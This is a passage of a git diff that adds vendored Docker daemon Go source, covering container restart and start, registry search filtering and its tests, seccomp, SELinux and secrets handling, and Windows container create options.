+func (daemon *Daemon) ContainerRestart(name string, seconds *int) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + if seconds == nil { + stopTimeout := container.StopTimeout() + seconds = &stopTimeout + } + if err := daemon.containerRestart(container, *seconds); err != nil { + return fmt.Errorf("Cannot restart container %s: %v", name, err) + } + return nil + +} + +// containerRestart attempts to gracefully stop and then start the +// container. When stopping, wait for the given duration in seconds to +// gracefully stop, before forcefully terminating the container. If +// given a negative duration, wait forever for a graceful stop. +func (daemon *Daemon) containerRestart(container *container.Container, seconds int) error { + // Avoid unnecessarily unmounting and then directly mounting + // the container when the container stops and then starts + // again + if err := daemon.Mount(container); err == nil { + defer daemon.Unmount(container) + } + + if container.IsRunning() { + // set AutoRemove flag to false before stop so the container won't be + // removed during restart process + autoRemove := container.HostConfig.AutoRemove + + container.HostConfig.AutoRemove = false + err := daemon.containerStop(container, seconds) + // restore AutoRemove irrespective of whether the stop worked or not + container.HostConfig.AutoRemove = autoRemove + // containerStop will write HostConfig to disk, we shall restore AutoRemove + // in disk too + if toDiskErr := container.ToDiskLocking(); toDiskErr != nil { + logrus.Errorf("Write container to disk error: %v", toDiskErr) + } + + if err != nil { + return err + } + } + + if err := daemon.containerStart(container, "", "", true); err != nil { + return err + } + + daemon.LogContainerEvent(container, "restart") + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/search.go b/vendor/github.com/docker/docker/daemon/search.go new file mode 100644 index 0000000000..5d2ac5d222 --- 
/dev/null +++ b/vendor/github.com/docker/docker/daemon/search.go @@ -0,0 +1,94 @@ +package daemon + +import ( + "fmt" + "strconv" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/dockerversion" +) + +var acceptedSearchFilterTags = map[string]bool{ + "is-automated": true, + "is-official": true, + "stars": true, +} + +// SearchRegistryForImages queries the registry for images matching +// term. authConfig is used to login. +func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, + authConfig *types.AuthConfig, + headers map[string][]string) (*registrytypes.SearchResults, error) { + + searchFilters, err := filters.FromParam(filtersArgs) + if err != nil { + return nil, err + } + if err := searchFilters.Validate(acceptedSearchFilterTags); err != nil { + return nil, err + } + + var isAutomated, isOfficial bool + var hasStarFilter = 0 + if searchFilters.Include("is-automated") { + if searchFilters.UniqueExactMatch("is-automated", "true") { + isAutomated = true + } else if !searchFilters.UniqueExactMatch("is-automated", "false") { + return nil, fmt.Errorf("Invalid filter 'is-automated=%s'", searchFilters.Get("is-automated")) + } + } + if searchFilters.Include("is-official") { + if searchFilters.UniqueExactMatch("is-official", "true") { + isOfficial = true + } else if !searchFilters.UniqueExactMatch("is-official", "false") { + return nil, fmt.Errorf("Invalid filter 'is-official=%s'", searchFilters.Get("is-official")) + } + } + if searchFilters.Include("stars") { + hasStars := searchFilters.Get("stars") + for _, hasStar := range hasStars { + iHasStar, err := strconv.Atoi(hasStar) + if err != nil { + return nil, fmt.Errorf("Invalid filter 'stars=%s'", hasStar) + } + if iHasStar > hasStarFilter { + hasStarFilter = iHasStar + } + } + } + + unfilteredResult, err := 
daemon.RegistryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers) + if err != nil { + return nil, err + } + + filteredResults := []registrytypes.SearchResult{} + for _, result := range unfilteredResult.Results { + if searchFilters.Include("is-automated") { + if isAutomated != result.IsAutomated { + continue + } + } + if searchFilters.Include("is-official") { + if isOfficial != result.IsOfficial { + continue + } + } + if searchFilters.Include("stars") { + if result.StarCount < hasStarFilter { + continue + } + } + filteredResults = append(filteredResults, result) + } + + return ®istrytypes.SearchResults{ + Query: unfilteredResult.Query, + NumResults: len(filteredResults), + Results: filteredResults, + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/search_test.go b/vendor/github.com/docker/docker/daemon/search_test.go new file mode 100644 index 0000000000..f5aa85a61e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/search_test.go @@ -0,0 +1,358 @@ +package daemon + +import ( + "fmt" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/registry" +) + +type FakeService struct { + registry.DefaultService + + shouldReturnError bool + + term string + results []registrytypes.SearchResult +} + +func (s *FakeService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) { + if s.shouldReturnError { + return nil, fmt.Errorf("Search unknown error") + } + return ®istrytypes.SearchResults{ + Query: s.term, + NumResults: len(s.results), + Results: s.results, + }, nil +} + +func TestSearchRegistryForImagesErrors(t *testing.T) { + errorCases := []struct { + filtersArgs string + shouldReturnError bool + expectedError string + }{ + { + expectedError: "Search unknown error", + 
shouldReturnError: true, + }, + { + filtersArgs: "invalid json", + expectedError: "invalid character 'i' looking for beginning of value", + }, + { + filtersArgs: `{"type":{"custom":true}}`, + expectedError: "Invalid filter 'type'", + }, + { + filtersArgs: `{"is-automated":{"invalid":true}}`, + expectedError: "Invalid filter 'is-automated=[invalid]'", + }, + { + filtersArgs: `{"is-automated":{"true":true,"false":true}}`, + expectedError: "Invalid filter 'is-automated", + }, + { + filtersArgs: `{"is-official":{"invalid":true}}`, + expectedError: "Invalid filter 'is-official=[invalid]'", + }, + { + filtersArgs: `{"is-official":{"true":true,"false":true}}`, + expectedError: "Invalid filter 'is-official", + }, + { + filtersArgs: `{"stars":{"invalid":true}}`, + expectedError: "Invalid filter 'stars=invalid'", + }, + { + filtersArgs: `{"stars":{"1":true,"invalid":true}}`, + expectedError: "Invalid filter 'stars=invalid'", + }, + } + for index, e := range errorCases { + daemon := &Daemon{ + RegistryService: &FakeService{ + shouldReturnError: e.shouldReturnError, + }, + } + _, err := daemon.SearchRegistryForImages(context.Background(), e.filtersArgs, "term", 25, nil, map[string][]string{}) + if err == nil { + t.Errorf("%d: expected an error, got nothing", index) + } + if !strings.Contains(err.Error(), e.expectedError) { + t.Errorf("%d: expected error to contain %s, got %s", index, e.expectedError, err.Error()) + } + } +} + +func TestSearchRegistryForImages(t *testing.T) { + term := "term" + successCases := []struct { + filtersArgs string + registryResults []registrytypes.SearchResult + expectedResults []registrytypes.SearchResult + }{ + { + filtersArgs: "", + registryResults: []registrytypes.SearchResult{}, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: "", + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: 
"description", + }, + }, + }, + { + filtersArgs: `{"is-automated":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"is-automated":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: true, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: true, + }, + }, + }, + { + filtersArgs: `{"is-automated":{"false":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: true, + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"is-automated":{"false":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: false, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: false, + }, + }, + }, + { + filtersArgs: `{"is-official":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"is-official":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: true, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: true, + }, + }, + }, + { + filtersArgs: `{"is-official":{"false":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: true, + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"is-official":{"false":true}}`, + registryResults: []registrytypes.SearchResult{ 
+ { + Name: "name", + Description: "description", + IsOfficial: false, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: false, + }, + }, + }, + { + filtersArgs: `{"stars":{"0":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + StarCount: 0, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + StarCount: 0, + }, + }, + }, + { + filtersArgs: `{"stars":{"1":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + StarCount: 0, + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"stars":{"1":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name0", + Description: "description0", + StarCount: 0, + }, + { + Name: "name1", + Description: "description1", + StarCount: 1, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name1", + Description: "description1", + StarCount: 1, + }, + }, + }, + { + filtersArgs: `{"stars":{"1":true}, "is-official":{"true":true}, "is-automated":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name0", + Description: "description0", + StarCount: 0, + IsOfficial: true, + IsAutomated: true, + }, + { + Name: "name1", + Description: "description1", + StarCount: 1, + IsOfficial: false, + IsAutomated: true, + }, + { + Name: "name2", + Description: "description2", + StarCount: 1, + IsOfficial: true, + IsAutomated: false, + }, + { + Name: "name3", + Description: "description3", + StarCount: 2, + IsOfficial: true, + IsAutomated: true, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name3", + Description: "description3", + StarCount: 2, + IsOfficial: true, + IsAutomated: true, + }, + }, + }, + } + for index, s := range successCases { + daemon := &Daemon{ + RegistryService: &FakeService{ + 
term: term, + results: s.registryResults, + }, + } + results, err := daemon.SearchRegistryForImages(context.Background(), s.filtersArgs, term, 25, nil, map[string][]string{}) + if err != nil { + t.Errorf("%d: %v", index, err) + } + if results.Query != term { + t.Errorf("%d: expected Query to be %s, got %s", index, term, results.Query) + } + if results.NumResults != len(s.expectedResults) { + t.Errorf("%d: expected NumResults to be %d, got %d", index, len(s.expectedResults), results.NumResults) + } + for _, result := range results.Results { + found := false + for _, expectedResult := range s.expectedResults { + if expectedResult.Name == result.Name && + expectedResult.Description == result.Description && + expectedResult.IsAutomated == result.IsAutomated && + expectedResult.IsOfficial == result.IsOfficial && + expectedResult.StarCount == result.StarCount { + found = true + break + } + } + if !found { + t.Errorf("%d: expected results %v, got %v", index, s.expectedResults, results.Results) + } + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go new file mode 100644 index 0000000000..ff1127b6c2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go @@ -0,0 +1,19 @@ +// +build linux,!seccomp + +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" + "github.com/opencontainers/runtime-spec/specs-go" +) + +var supportsSeccomp = false + +func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error { + if c.SeccompProfile != "" && c.SeccompProfile != "unconfined" { + return fmt.Errorf("seccomp profiles are not supported on this daemon, you cannot specify a custom seccomp profile") + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/seccomp_linux.go b/vendor/github.com/docker/docker/daemon/seccomp_linux.go new file mode 100644 index 0000000000..7f16733d95 --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/seccomp_linux.go @@ -0,0 +1,55 @@ +// +build linux,seccomp + +package daemon + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" + "github.com/docker/docker/profiles/seccomp" + "github.com/opencontainers/runtime-spec/specs-go" +) + +var supportsSeccomp = true + +func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error { + var profile *specs.Seccomp + var err error + + if c.HostConfig.Privileged { + return nil + } + + if !daemon.seccompEnabled { + if c.SeccompProfile != "" && c.SeccompProfile != "unconfined" { + return fmt.Errorf("Seccomp is not enabled in your kernel, cannot run a custom seccomp profile.") + } + logrus.Warn("Seccomp is not enabled in your kernel, running container without default profile.") + c.SeccompProfile = "unconfined" + } + if c.SeccompProfile == "unconfined" { + return nil + } + if c.SeccompProfile != "" { + profile, err = seccomp.LoadProfile(c.SeccompProfile, rs) + if err != nil { + return err + } + } else { + if daemon.seccompProfile != nil { + profile, err = seccomp.LoadProfile(string(daemon.seccompProfile), rs) + if err != nil { + return err + } + } else { + profile, err = seccomp.GetDefaultProfile(rs) + if err != nil { + return err + } + } + } + + rs.Linux.Seccomp = profile + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go new file mode 100644 index 0000000000..b3691e96af --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go @@ -0,0 +1,5 @@ +// +build !linux + +package daemon + +var supportsSeccomp = false diff --git a/vendor/github.com/docker/docker/daemon/secrets.go b/vendor/github.com/docker/docker/daemon/secrets.go new file mode 100644 index 0000000000..355cb1e139 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/secrets.go @@ -0,0 +1,36 @@ +package daemon + +import ( + 
"github.com/Sirupsen/logrus" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/swarmkit/agent/exec" +) + +// SetContainerSecretStore sets the secret store backend for the container +func (daemon *Daemon) SetContainerSecretStore(name string, store exec.SecretGetter) error { + c, err := daemon.GetContainer(name) + if err != nil { + return err + } + + c.SecretStore = store + + return nil +} + +// SetContainerSecretReferences sets the container secret references needed +func (daemon *Daemon) SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error { + if !secretsSupported() && len(refs) > 0 { + logrus.Warn("secrets are not supported on this platform") + return nil + } + + c, err := daemon.GetContainer(name) + if err != nil { + return err + } + + c.SecretReferences = refs + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/secrets_linux.go b/vendor/github.com/docker/docker/daemon/secrets_linux.go new file mode 100644 index 0000000000..fca4e12598 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/secrets_linux.go @@ -0,0 +1,7 @@ +// +build linux + +package daemon + +func secretsSupported() bool { + return true +} diff --git a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go new file mode 100644 index 0000000000..d6f36fda1e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux + +package daemon + +func secretsSupported() bool { + return false +} diff --git a/vendor/github.com/docker/docker/daemon/selinux_linux.go b/vendor/github.com/docker/docker/daemon/selinux_linux.go new file mode 100644 index 0000000000..83a3447111 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/selinux_linux.go @@ -0,0 +1,17 @@ +// +build linux + +package daemon + +import "github.com/opencontainers/runc/libcontainer/selinux" + +func selinuxSetDisabled() { + 
selinux.SetDisabled() +} + +func selinuxFreeLxcContexts(label string) { + selinux.FreeLxcContexts(label) +} + +func selinuxEnabled() bool { + return selinux.SelinuxEnabled() +} diff --git a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go new file mode 100644 index 0000000000..25a56ad157 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go @@ -0,0 +1,13 @@ +// +build !linux + +package daemon + +func selinuxSetDisabled() { +} + +func selinuxFreeLxcContexts(label string) { +} + +func selinuxEnabled() bool { + return false +} diff --git a/vendor/github.com/docker/docker/daemon/start.go b/vendor/github.com/docker/docker/daemon/start.go new file mode 100644 index 0000000000..6c94fd5482 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/start.go @@ -0,0 +1,230 @@ +package daemon + +import ( + "fmt" + "net/http" + "runtime" + "strings" + "syscall" + "time" + + "google.golang.org/grpc" + + "github.com/Sirupsen/logrus" + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/runconfig" +) + +// ContainerStart starts a container. 
+func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.HostConfig, checkpoint string, checkpointDir string) error { + if checkpoint != "" && !daemon.HasExperimental() { + return apierrors.NewBadRequestError(fmt.Errorf("checkpoint is only supported in experimental mode")) + } + + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if container.IsPaused() { + return fmt.Errorf("Cannot start a paused container, try unpause instead.") + } + + if container.IsRunning() { + err := fmt.Errorf("Container already started") + return apierrors.NewErrorWithStatusCode(err, http.StatusNotModified) + } + + // Windows does not have the backwards compatibility issue here. + if runtime.GOOS != "windows" { + // This is kept for backward compatibility - hostconfig should be passed when + // creating a container, not during start. + if hostConfig != nil { + logrus.Warn("DEPRECATED: Setting host configuration options when the container starts is deprecated and has been removed in Docker 1.12") + oldNetworkMode := container.HostConfig.NetworkMode + if err := daemon.setSecurityOptions(container, hostConfig); err != nil { + return err + } + if err := daemon.mergeAndVerifyLogConfig(&hostConfig.LogConfig); err != nil { + return err + } + if err := daemon.setHostConfig(container, hostConfig); err != nil { + return err + } + newNetworkMode := container.HostConfig.NetworkMode + if string(oldNetworkMode) != string(newNetworkMode) { + // if user has change the network mode on starting, clean up the + // old networks. It is a deprecated feature and has been removed in Docker 1.12 + container.NetworkSettings.Networks = nil + if err := container.ToDisk(); err != nil { + return err + } + } + container.InitDNSHostConfig() + } + } else { + if hostConfig != nil { + return fmt.Errorf("Supplying a hostconfig on start is not supported. It should be supplied on create") + } + } + + // check if hostConfig is in line with the current system settings. 
+ // It may happen cgroups are umounted or the like. + if _, err = daemon.verifyContainerSettings(container.HostConfig, nil, false); err != nil { + return err + } + // Adapt for old containers in case we have updates in this function and + // old containers never have chance to call the new function in create stage. + if hostConfig != nil { + if err := daemon.adaptContainerSettings(container.HostConfig, false); err != nil { + return err + } + } + + return daemon.containerStart(container, checkpoint, checkpointDir, true) +} + +// Start starts a container +func (daemon *Daemon) Start(container *container.Container) error { + return daemon.containerStart(container, "", "", true) +} + +// containerStart prepares the container to run by setting up everything the +// container needs, such as storage and networking, as well as links +// between containers. The container is left waiting for a signal to +// begin running. +func (daemon *Daemon) containerStart(container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (err error) { + start := time.Now() + container.Lock() + defer container.Unlock() + + if resetRestartManager && container.Running { // skip this check if already in restarting step and resetRestartManager==false + return nil + } + + if container.RemovalInProgress || container.Dead { + return fmt.Errorf("Container is marked for removal and cannot be started.") + } + + // if we encounter an error during start we need to ensure that any other + // setup has been cleaned up properly + defer func() { + if err != nil { + container.SetError(err) + // if no one else has set it, make sure we don't leave it at zero + if container.ExitCode() == 0 { + container.SetExitCode(128) + } + container.ToDisk() + + container.Reset(false) + + daemon.Cleanup(container) + // if containers AutoRemove flag is set, remove it after clean up + if container.HostConfig.AutoRemove { + container.Unlock() + if err := daemon.ContainerRm(container.ID, 
&types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil { + logrus.Errorf("can't remove container %s: %v", container.ID, err) + } + container.Lock() + } + } + }() + + if err := daemon.conditionalMountOnStart(container); err != nil { + return err + } + + // Make sure NetworkMode has an acceptable value. We do this to ensure + // backwards API compatibility. + container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig) + + if err := daemon.initializeNetworking(container); err != nil { + return err + } + + spec, err := daemon.createSpec(container) + if err != nil { + return err + } + + createOptions, err := daemon.getLibcontainerdCreateOptions(container) + if err != nil { + return err + } + + if resetRestartManager { + container.ResetRestartManager(true) + } + + if checkpointDir == "" { + checkpointDir = container.CheckpointDir() + } + + if err := daemon.containerd.Create(container.ID, checkpoint, checkpointDir, *spec, container.InitializeStdio, createOptions...); err != nil { + errDesc := grpc.ErrorDesc(err) + contains := func(s1, s2 string) bool { + return strings.Contains(strings.ToLower(s1), s2) + } + logrus.Errorf("Create container failed with error: %s", errDesc) + // if we receive an internal error from the initial start of a container then lets + // return it instead of entering the restart loop + // set to 127 for container cmd not found/does not exist) + if contains(errDesc, container.Path) && + (contains(errDesc, "executable file not found") || + contains(errDesc, "no such file or directory") || + contains(errDesc, "system cannot find the file specified")) { + container.SetExitCode(127) + } + // set to 126 for container cmd can't be invoked errors + if contains(errDesc, syscall.EACCES.Error()) { + container.SetExitCode(126) + } + + // attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts + if contains(errDesc, syscall.ENOTDIR.Error()) { + errDesc += ": Are you 
trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type" + container.SetExitCode(127) + } + + return fmt.Errorf("%s", errDesc) + } + + containerActions.WithValues("start").UpdateSince(start) + + return nil +} + +// Cleanup releases any network resources allocated to the container along with any rules +// around how containers are linked together. It also unmounts the container's root filesystem. +func (daemon *Daemon) Cleanup(container *container.Container) { + daemon.releaseNetwork(container) + + container.UnmountIpcMounts(detachMounted) + + if err := daemon.conditionalUnmountOnCleanup(container); err != nil { + // FIXME: remove once reference counting for graphdrivers has been refactored + // Ensure that all the mounts are gone + if mountid, err := daemon.layerStore.GetMountID(container.ID); err == nil { + daemon.cleanupMountsByID(mountid) + } + } + + if err := container.UnmountSecrets(); err != nil { + logrus.Warnf("%s cleanup: failed to unmount secrets: %s", container.ID, err) + } + + for _, eConfig := range container.ExecCommands.Commands() { + daemon.unregisterExecCommand(container, eConfig) + } + + if container.BaseFS != "" { + if err := container.UnmountVolumes(daemon.LogVolumeEvent); err != nil { + logrus.Warnf("%s cleanup: Failed to umount volumes: %v", container.ID, err) + } + } + container.CancelAttachContext() +} diff --git a/vendor/github.com/docker/docker/daemon/start_unix.go b/vendor/github.com/docker/docker/daemon/start_unix.go new file mode 100644 index 0000000000..6bbe485075 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/start_unix.go @@ -0,0 +1,31 @@ +// +build !windows + +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" + "github.com/docker/docker/libcontainerd" +) + +func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) { + createOptions := []libcontainerd.CreateOption{} + 
+ // Ensure a runtime has been assigned to this container + if container.HostConfig.Runtime == "" { + container.HostConfig.Runtime = stockRuntimeName + container.ToDisk() + } + + rt := daemon.configStore.GetRuntime(container.HostConfig.Runtime) + if rt == nil { + return nil, fmt.Errorf("no such runtime '%s'", container.HostConfig.Runtime) + } + if UsingSystemd(daemon.configStore) { + rt.Args = append(rt.Args, "--systemd-cgroup=true") + } + createOptions = append(createOptions, libcontainerd.WithRuntime(rt.Path, rt.Args)) + + return createOptions, nil +} diff --git a/vendor/github.com/docker/docker/daemon/start_windows.go b/vendor/github.com/docker/docker/daemon/start_windows.go new file mode 100644 index 0000000000..faa7575224 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/start_windows.go @@ -0,0 +1,205 @@ +package daemon + +import ( + "fmt" + "io/ioutil" + "path/filepath" + "strings" + + "github.com/docker/docker/container" + "github.com/docker/docker/layer" + "github.com/docker/docker/libcontainerd" + "golang.org/x/sys/windows/registry" +) + +const ( + credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs` + credentialSpecFileLocation = "CredentialSpecs" +) + +func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) { + createOptions := []libcontainerd.CreateOption{} + + // Are we going to run as a Hyper-V container? + hvOpts := &libcontainerd.HyperVIsolationOption{} + if container.HostConfig.Isolation.IsDefault() { + // Container is set to use the default, so take the default from the daemon configuration + hvOpts.IsHyperV = daemon.defaultIsolation.IsHyperV() + } else { + // Container is requesting an isolation mode. Honour it. 
+ hvOpts.IsHyperV = container.HostConfig.Isolation.IsHyperV() + } + + // Generate the layer folder of the layer options + layerOpts := &libcontainerd.LayerOption{} + m, err := container.RWLayer.Metadata() + if err != nil { + return nil, fmt.Errorf("failed to get layer metadata - %s", err) + } + if hvOpts.IsHyperV { + hvOpts.SandboxPath = filepath.Dir(m["dir"]) + } + + layerOpts.LayerFolderPath = m["dir"] + + // Generate the layer paths of the layer options + img, err := daemon.imageStore.Get(container.ImageID) + if err != nil { + return nil, fmt.Errorf("failed to graph.Get on ImageID %s - %s", container.ImageID, err) + } + // Get the layer path for each layer. + max := len(img.RootFS.DiffIDs) + for i := 1; i <= max; i++ { + img.RootFS.DiffIDs = img.RootFS.DiffIDs[:i] + layerPath, err := layer.GetLayerPath(daemon.layerStore, img.RootFS.ChainID()) + if err != nil { + return nil, fmt.Errorf("failed to get layer path from graphdriver %s for ImageID %s - %s", daemon.layerStore, img.RootFS.ChainID(), err) + } + // Reverse order, expecting parent most first + layerOpts.LayerPaths = append([]string{layerPath}, layerOpts.LayerPaths...) 
+ } + + // Get endpoints for the libnetwork allocated networks to the container + var epList []string + AllowUnqualifiedDNSQuery := false + gwHNSID := "" + if container.NetworkSettings != nil { + for n := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(n) + if err != nil { + continue + } + + ep, err := container.GetEndpointInNetwork(sn) + if err != nil { + continue + } + + data, err := ep.DriverInfo() + if err != nil { + continue + } + + if data["GW_INFO"] != nil { + gwInfo := data["GW_INFO"].(map[string]interface{}) + if gwInfo["hnsid"] != nil { + gwHNSID = gwInfo["hnsid"].(string) + } + } + + if data["hnsid"] != nil { + epList = append(epList, data["hnsid"].(string)) + } + + if data["AllowUnqualifiedDNSQuery"] != nil { + AllowUnqualifiedDNSQuery = true + } + } + } + + if gwHNSID != "" { + epList = append(epList, gwHNSID) + } + + // Read and add credentials from the security options if a credential spec has been provided. + if container.HostConfig.SecurityOpt != nil { + for _, sOpt := range container.HostConfig.SecurityOpt { + sOpt = strings.ToLower(sOpt) + if !strings.Contains(sOpt, "=") { + return nil, fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt) + } + var splitsOpt []string + splitsOpt = strings.SplitN(sOpt, "=", 2) + if len(splitsOpt) != 2 { + return nil, fmt.Errorf("invalid security option: %s", sOpt) + } + if splitsOpt[0] != "credentialspec" { + return nil, fmt.Errorf("security option not supported: %s", splitsOpt[0]) + } + + credentialsOpts := &libcontainerd.CredentialsOption{} + var ( + match bool + csValue string + err error + ) + if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match { + if csValue == "" { + return nil, fmt.Errorf("no value supplied for file:// credential spec security option") + } + if credentialsOpts.Credentials, err = readCredentialSpecFile(container.ID, daemon.root, filepath.Clean(csValue)); err != nil { + return nil, err + } + } else if match, csValue = 
getCredentialSpec("registry://", splitsOpt[1]); match { + if csValue == "" { + return nil, fmt.Errorf("no value supplied for registry:// credential spec security option") + } + if credentialsOpts.Credentials, err = readCredentialSpecRegistry(container.ID, csValue); err != nil { + return nil, err + } + } else { + return nil, fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value") + } + createOptions = append(createOptions, credentialsOpts) + } + } + + // Now add the remaining options. + createOptions = append(createOptions, &libcontainerd.FlushOption{IgnoreFlushesDuringBoot: !container.HasBeenStartedBefore}) + createOptions = append(createOptions, hvOpts) + createOptions = append(createOptions, layerOpts) + if epList != nil { + createOptions = append(createOptions, &libcontainerd.NetworkEndpointsOption{Endpoints: epList, AllowUnqualifiedDNSQuery: AllowUnqualifiedDNSQuery}) + } + + return createOptions, nil +} + +// getCredentialSpec is a helper function to get the value of a credential spec supplied +// on the CLI, stripping the prefix +func getCredentialSpec(prefix, value string) (bool, string) { + if strings.HasPrefix(value, prefix) { + return true, strings.TrimPrefix(value, prefix) + } + return false, "" +} + +// readCredentialSpecRegistry is a helper function to read a credential spec from +// the registry. If not found, we return an empty string and warn in the log. +// This allows for staging on machines which do not have the necessary components. 
+func readCredentialSpecRegistry(id, name string) (string, error) { + var ( + k registry.Key + err error + val string + ) + if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil { + return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation) + } + if val, _, err = k.GetStringValue(name); err != nil { + if err == registry.ErrNotExist { + return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id) + } + return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id) + } + return val, nil +} + +// readCredentialSpecFile is a helper function to read a credential spec from +// a file. If not found, we return an empty string and warn in the log. +// This allows for staging on machines which do not have the necessary components. +func readCredentialSpecFile(id, root, location string) (string, error) { + if filepath.IsAbs(location) { + return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute") + } + base := filepath.Join(root, credentialSpecFileLocation) + full := filepath.Join(base, location) + if !strings.HasPrefix(full, base) { + return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base) + } + bcontents, err := ioutil.ReadFile(full) + if err != nil { + return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err) + } + return string(bcontents[:]), nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats.go b/vendor/github.com/docker/docker/daemon/stats.go new file mode 100644 index 0000000000..51f5962d17 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats.go @@ -0,0 +1,158 @@ +package daemon + +import ( + "encoding/json" + "errors" + "fmt" + "runtime" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + 
